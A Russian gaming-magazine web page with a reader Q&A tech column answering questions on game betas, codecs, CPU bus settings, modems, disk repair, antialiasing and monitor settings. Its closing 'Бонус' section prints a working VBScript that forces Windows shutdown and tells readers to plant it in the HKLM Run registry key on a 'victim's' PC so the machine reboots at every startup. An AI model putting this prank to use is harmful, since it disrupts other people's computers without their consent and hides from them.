IGROMANIA.RU
Registration
MoreLess
Популярные за неделю
Популярные за месяц
«Викинг». The Return of the (Vi)king Кино > «Викинг». The Return of the (Vi)king
«300 спартанцев» Зака Снайдера и «Гладиатор» Ридли Скотта успешны и узнаваемы, но ни капли ни историчны. Российский «Викинг» идет другим путем.
Комментариев: 52
Презентация Nintendo Switch. Самое главное об играх для новой консоли Спец > Презентация Nintendo Switch. Самое главное об играх для новой консоли
Nintendo заявила, что в разработке находится более восьмидесяти игр для консоли Switch. Рассказываем о тех, что выйдут в ближайшее время.
Комментариев: 19
Самые интересные проекты января: от Gravity Rush 2 и Resident Evil 7 до Yakuza 0 и Tales of Berseria Спец > Самые интересные проекты января: от Gravity Rush 2 и Resident Evil 7 до Yakuza 0 и Tales of Berseria
Продолжение Gravity Rush, возвращение «Обители зла», приключения в мире японской мафии и прочие интересности.
Комментариев: 13
Planet Coaster: парк развлечений своими руками Рецензии > Planet Coaster: парк развлечений своими руками
С самого детства мечтали построить идеальный парк аттракционов? Planet Coaster от Frontier Developments это позволяет!
Комментариев: 4
Главные новинки CES 2017: от VR-устройств до «умных» велосипедов и систем слежения за холодильником Железный цех > Главные новинки CES 2017: от VR-устройств до «умных» велосипедов и систем слежения за холодильником
Подводим итоги крупнейшей международной выставки потребительской электроники.
Комментариев: 2
Бурные 1980-е. Первые впечатления от Yakuza 0 В разработке > Бурные 1980-е. Первые впечатления от Yakuza 0
Знаменитая серия отправляет в прошлое, чтобы рассказать историю о том, как Кадзума Кирю стал одним из самых известных мафиози.
Комментариев: 1
   От автора:
   24 часа в сутки мысленно с вами. В остальное время со мной можно связаться по мылу hot-line@igromania.ru или на форуме "Горячев ONLINE" на сайте вашего наилюбимейшего журнала www.igromania.ru.

   Объясните, пожалуйста, что такое альфа- и бета-версии игр и чем они отличаются.

   Это промежуточные версии игр, которые по тем или иным причинам еще непригодны для конечного пользователя. Или пригодны, но с оговорками. Разработчики обычно выпускают альфа- и бета-версии игр со словами: "Можете посмотреть, заценить, поиграться, но мы ни за что не отвечаем".
   Официальная классификация такова. Альфа-версия — это прототип, призванный в основном продемонстрировать технические возможности будущего продукта. Изредка в "альфе" можно встретить зачатки геймплея, укомплектованные ранними набросками сюжета. Глюки, фатальные ошибки, запуск и конфигурирование движка через командную строку считаются на данном этапе более чем нормальным явлением. Главная целевая аудитория, для которой выпускается альфа, — это издатели и изредка представители СМИ.
   Бета-версия — это уже по сути своей нетленный образ будущей игры. Ее истинное лицо, которое с этого момента останется практически неизменным. Предназначение "беты" — это поиск и геноцид всевозможных ошибок, а также доведение до ума геймплея, который дебютирует именно в бете. Основная масса счастливчиков, допущенных до тела игры на этой стадии, классифицируется как "бета-тестер".
   Меня очень интересует способ кодирования видео, использованный в играх "Рандеву с незнакомкой" и "За стеной". С помощью каких программ можно закодировать видео, и какова вероятность взлома?

   Насколько я знаю, в обеих этих играх, как и во многих подобных, нет какого-то особого алгоритма кодирования. Они используют общепринятые кодеки (DivX, Smaсk, Bink и т.д.), иногда просто изменяют расширения на какую-нибудь белиберду или удаляют так называемые "хедеры" (первые несколько байт файла, которые показывают его тип).
    Так что вопрос ты задал не совсем корректно. Никому ничего взламывать не приходится — все и так открыто. Просто для каждого типа файлов нужен соответствующий кодек и минимум смекалки. Например, для воспроизведения и кодирования форматов Bink и SMK нужна программа Rad Video Tools, которая неоднократно посещала наш диск.
   Купил Athlon XP 2000+, поставил на материнку Elitegroup K7VTA3 (VIA KT333). Но процессор определяется как 1250 МГц, а в 2000+ вроде 1667 МГц? И вот задумался, то ли меня... хм, то ли что-то нужно сделать.

   Скорее всего, сборщики просто ошиблись с джамперами на материнской плате или с настройками в BIOS. Для начала посети BIOS и проверь частоту системной шины (если в твоем BIOS ее можно менять). Там же должен быть указан множитель (но менять его нельзя). Если множитель твоего процессора 12.5, значит, все в порядке — у тебя именно Athlon 2000+. Частота системной шины с таким множителем должна быть равна 133 МГц. А у тебя она скорее всего 100 МГц. Просто выставь частоту 133 МГц, и процессор определится правильно.
    Если же в BIOS менять частоту системной шины нельзя, вскрой корпус и, сверившись по руководству к материнской плате, переставь джамперы в положение, соответствующее частоте 133. И все вернется на круги своя.
   Можно ли без всяческих "железных" изысков переписать звук с магнитофона (муз. центра и т.д.) на компьютер? Если да, то как и с помощью чего?

   Совсем без изысков нельзя, ибо электрические сигналы, увы, пока не научились передаваться воздушно-капельным путем. Для старта можешь попробовать наиболее простой вариант — включи магнитофон и к его динамику поднеси компьютерный микрофон, а в Windows в программе "Звукозапись" (Sound Recorder) включи "запись" (за тавтологию винить переводчиков Microsoft). Отмечу, что качество при таком способе будет более чем ужасным.
    Гораздо правильнее будет приобрести такой небольшой изыск, как аудиошнур со стереоджеками на концах. Конечно, можно и с моноджеками, но тогда у тебя не будет стереосигнала. Да, кто не знает, джек (мини-джек, на самом деле) — это такой стандартный штекер, повсеместно применяемый в наушниках, плеерах, звуковых картах и прочей музыкальной аппаратуре. Если у тебя не слишком распальцованные колонки, на концах их сигнальных проводов находятся именно мини-джеки.
    Провод следует воткнуть одним концом в вход Line In звуковой карты, а другим — в аудиовыход магнитофона. Впрочем, у магнитофона может и не быть аудиовыхода (сейчас это не редкость), тогда втыкай в выход для наушников (уж он должен быть наверняка). Запускай ту же "Звукозапись" и пиши на здоровье.
   Живу в селе, местная АТС шаговая, 60 км до провайдера. Соединяюсь с инетом только на скорости 4,8 кбит/с. Провайдер говорит, что соединение должно быть не ниже 19 кбит/с. Мол, настройки у меня не те. Это правда? Какие настройки надо исправить?

   Для начала воспользуйся каким-нибудь "ускорителем интернета" — то есть утилитой, оптимизирующей настройки соединения (совсем недавно на нашем диске был Throttle). Некоторые из них и впрямь помогают. Потом уменьшай число ретрейнов. Когда модем соединяется с другим модемом, они начинают вместе договариваться о скорости. Если в одном из модемов верхняя планка скорости стоит на максимуме (115200 бод), они начнут пробовать разные скорости, постепенно снижая их. Каждая такая попытка длится определенное время и может повесить связь. Поэтому, если искусственно понизить максимальную скорость в настройках модема, связь будет более стабильной. С твоим соединением целесообразно понизить скорость до 14400 бод. С помощью AT-команд в строке инициализации модема (есть такие опции в настройках модема) установи время ожидания захвата несущей = 40, время ожидания несущей = 100. Конкретные AT-команды я тебе подсказать не могу, тут все от модема зависит. Ищи документацию по своему модему в Сети.
   Решил я как-то дефрагментацию сделать. Включил Norton Speed Disc, и на первыхсекундахсканирования он мне написал: "ИЗБРАН~1 contains illegal long file name entries on drive C:", потом он меня послал такими словами: "An error has been detected that can be fixed by running NDD. We recommend that you run it now". Этот самый NDD (Norton Disc Doctor) сканирует первые три пункта и начинает сканировать заново, до бесконечности. Решил стандартную дефрагментацию запустить. Она доходит до первых трех процентов и начинает сканировать заново. Стандартная лечилка диска тоже доходит до половины и рестарт делает. Я не знаю, что делать... Форматировать так неохота, и уж тем более новый винт покупать... Помогите!!!

   Уж сколько раз твердили миру не запускать лечилки подлые из-под виндов...
   Каждый раз, когда Windows требуется обратиться к файлу подкачки, твоя, вероятнее всего старая, версия NDD воспринимает это как личную файловую измену и пытается сканировать диск заново. Так как обращения к свопу происходят регулярно — весь процесс зацикливается.
    Перезагружайся и запускай NDD из-под "good old MS-DOS". Он просканирует диск, почешет репу, и в итоге, скорее всего, все вылечит. Но! Есть ошибки, с которыми даже NDD справиться не может. В частности, с твоей ошибкой "длинных имен файлов" связан один очень неприятный момент. Иногда NDD сообщает о такой ошибке, если повреждены записи текущего кластера. В этом случае, "пока лечит", он так "покалечит" твои файлы, что мало не покажется. Поэтому, прежде чем соглашаться вносить изменения, запусти NDD еще раз и прогони полный текст поверхности диска. Если он найдет сбойный кластер, считай, ты избежал крупной неприятности. NDD пометит этот кластер как сбойный, и можно позволить ему вносить изменения в эти самые файлы с длинными именами.
    Еще один вариант — совсем уж невероятный в свете того, что дата отправки письма 2003, а не 1997 год... В общем, старые и глупые англицкие версии Norton Disk Doctor не разумели русские имена файлов и официально считали их "illegal long file name"... В этом случае спили мушку, Джонни...
   В бенчмарке 3DMark2001 SE в ряде тестов с включенным антиалиасингом мой компьютер набирает 3758 баллов, а с выключенным — 7257. Почему такая большая разница?

   Антиалиасинг — это способ получения плавных границ между объектом и фоном путем интерполяции краевых пикселей текстуры. Увы, на данный момент действительно быстрого и экономичного алгоритма для выполнения такой, казалось бы, пустяковой операции не существует.
    В реалиях современности — антиалиасинг есть суть весьма и весьма ресурсоемкий процесс. Для вящего понимания попробуйте представить себе, что для каждого пиксела необходимо просчитать матрицу из 16, 32, а то и 64 соседних пикселов (зависит от типа антиалиасинга). Наиболее распространенный алгоритм называется "субпиксельный антиалиасинг". Его суть в том, что вся сцена рендерится в большом разрешении (суперсэмплинг), а потом сжимается до размера экрана. Значительно ускоряетэтот процесс тот факт, что ускорители обрабатывают сцену не целиком, а по частям. Для каждого региона нужно выполнить отдельный субпиксельный антиалиасинг. Когда в играх ты задаешь 2x или 4x режим антиалиасинга, то как раз и определяешь, во сколько раз виртуальный фрейм больше реального, а это напрямую влияет на качество изображения (чем больше — тем лучше).
   Акселераторы ускоряют этот процесс либо частично, либо вообще не ускоряют. Следовательно, всю работу по интерполяции приходится выполнять центральному процессору. Отсюда и падение производительности.
   У меня такая проблема. Недавно переустановил драйвер видеокарты (NVIDIA Riva TNT 2) на NVIDIA Detonator XP ver.29.42. После перезагрузки разрешение с 1024*768 переключилось на 800*600 и само изображение на мониторе было как бы в окне. Я опять поставил 1024*768, и теперь большинство игр идут не растягиваясь по экрану, а тоже как бы в окне 800*600, кроме начального меню (game, options и т.д.), если только в опциях игры не поставить разрешение 1024*768. Посоветуйте, пожалуйста, как сделать так, чтобы изображение игры растягивалось по экрану независимо от разрешения в игре.

   Проблема, которую ты описал, кроется не в видеокарте, а в мониторе. Дело в том, что в мониторе есть специальная постоянная память, где записываются параметры изображения для разных режимов и разрешений. При смене разрешения экрана (это происходит, когда ты входишь в игру, перемещаешся из меню игры в главное окно игры или возвращаешься обратно в систему) монитор в своей памяти находит эти параметры и применяет их. Если ты с помощью элементов управления монитора изменяешь его параметры (в том числе высоту и ширину изображения, его смещение по вертикали и горизонтали), эти параметры применяются и запоминаются только для текущего разрешения. Кроме того, в разных разрешениях параметры экрана выражаются в разных единицах (из-за несопоставимости текущего размера пиксела и зерна экрана). Вот в этом и кроется твоя проблема. Как все это дело исправить? А очень просто. Переведи монитор в разрешение 640х480 с помощью панели управления. Теперь элементами управления на самом мониторе растяни изображение на весь экран. Теперь поставь разрешение 800х600. Снова растяни изображение на весь экран. Теперь поставь 1024х768 и опять растяни изображение на весь экран. Теперь в памяти монитора хранятся правильные параметры для каждого из разрешений.
   В некоторых случаях этот фокус может не пройти, потому что монитор хранит отдельные настройки не только для разных разрешений, но и для сочетания разрешение-частота обновления. Изменять эти настройки можно с помощью специальных утилит вроде NVidia Refresh Rate Fix, который неоднократно выкладывался на наш диск.

   Бонус

   Подрубрика "Бонус" на глазах становится все популярнее и читабельнее, что, конечно, не может не радовать. Приятно, что вы, наши ув. читатели, не просто копируете советы, но кропотливо пытаетесь приспособить их под свои нужды, а иногда даже удивляете меня неожиданными выводами. Вот, например, наш постоянный читатель Евгений Горявин придумал свой собственный оригинальный вариант прикола "Перезагрузка компьютера после загрузки". Дадим ему слово.
   Создайте текстовый файл с расширением vbs и пишите в нем:
   Sub Zapadlo(Upss,Wait)
   Set WshShell=WScript.CreateObject("WScript.Shell")
   X=WshShell.Run(Upss,Wait)
   End Sub
   Call Zapadlo("rundll32 shell32,SHExitWindowsEx-1",True)
   Это обыкновенный VBScript. Далее на компьютере жертвы запускаем Regedit и в ключе HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run создаем строковой параметр StartUP Script со значением, равным пути к нашему скрипту. Перезагружаемся, и...

   Способ очень хороший, а главное — действенный. В моем — изначальном —варианте (прошлый выпуск "Горячей линии") более или менее подкованный юзер смог бы найти и нейтрализовать источник заразы. В варианте же Евгения это становится на порядок сложнее, так как мало кто знает про существование ключа \CurrentVersion\Run, а также про факт коварности невинного vbs-скрипта.
   При внесении изменений всеми силами постарайтесь не удалить по ошибке действительно нужные параметры. По этому же адресу могут быть прописаны некоторые полезные утилиты.
   Обратите внимание на то, что этот же способ можно использовать не только для создания развеселых подлянок. Windows весьма неплохо говорит на VBScript, и наш святой долг этим фактом воспользоваться. Например, таким образом реально сотворить служебный скрипт, который будет запускаться при старте системы и делать что-нибудь полезное. Например, закачивать из интернета свежий троян... Но об этом в следующий раз...
В этом году было не так много квестов, но те, что были, — все как на подбор хороши.
Nintendo заявила, что в разработке находится более восьмидесяти игр для консоли Switch. Рассказываем о тех, что выйдут в ближайшее время.
В 2016 году вышло немало всяческих переизданий, ремейков и HD-версий. Выбираем лучшие из них.
«300 спартанцев» Зака Снайдера и «Гладиатор» Ридли Скотта успешны и узнаваемы, но ни капли ни историчны. Российский «Викинг» идет другим путем.
Комментарии к статьям
Войти и прокомментировать                Войти под логином игромании | Зарегистрироваться
Главные новости
Самые комментируемые статьи за месяц:
Кино > «Викинг». The Return of the (Vi)king
Кино > Ассасины и тамплиеры на большом экране. Фильм «Кредо убийцы»
Спец > Лучший мой подарочек — это Xbox One S!
Спец > Достать геймпад и плакать: игры, берущие за душу: от Ori and the Blind Forest и This War Of Mine до BioShock Infinite и Life is Strange
Спец > Презентация Nintendo Switch. Самое главное об играх для новой консоли
Рецензии > Соборы в небесах. Обзор Space Hulk: Deathwing
Железный цех > В ожидании ZEN. Тестируем игровой компьютер Edelweiss MSI Edition на базе AMD 970
Спец > Горячий осенне-зимний сезон Windows Store. Главные игровые новинки
Спец > На скорости 160 км/ч, или Как работают гоночные игры
Прямым текстом > Darksiders: Warmastered Edition — жизнеспособное чудище Франкенштейна
Поиск по сайту Игровые платформы: PC  |   X360  |   XONE  |   PS3  |   PS4  |   Wii  |   Wii U  |   PSP  |   Vita  |   NDS  |   3DS  |   Android  |   iOS
1997-2017 ООО «Игромедиа». Мнение авторов и посетителей сайта может не совпадать с мнением редакции. Полное или частичное воспроизведение материалов сайта и журнала допускается только с согласия редакции. Для прямого контакта с редакцией пишите на основную почту «Игромании.ру».
Пользовательское соглашение

КОММЕРЧЕСКИЕ ССЫЛКИ:
Механизм выбора платформы позволяет отображать на страницах информационного портала материалы, относящиеся строго к выбранным платформам.

Каждый пользователь индивидуально выбирает для себя интересующие его игровые платформы.
 
Rambler's Top100 Яндекс цитирования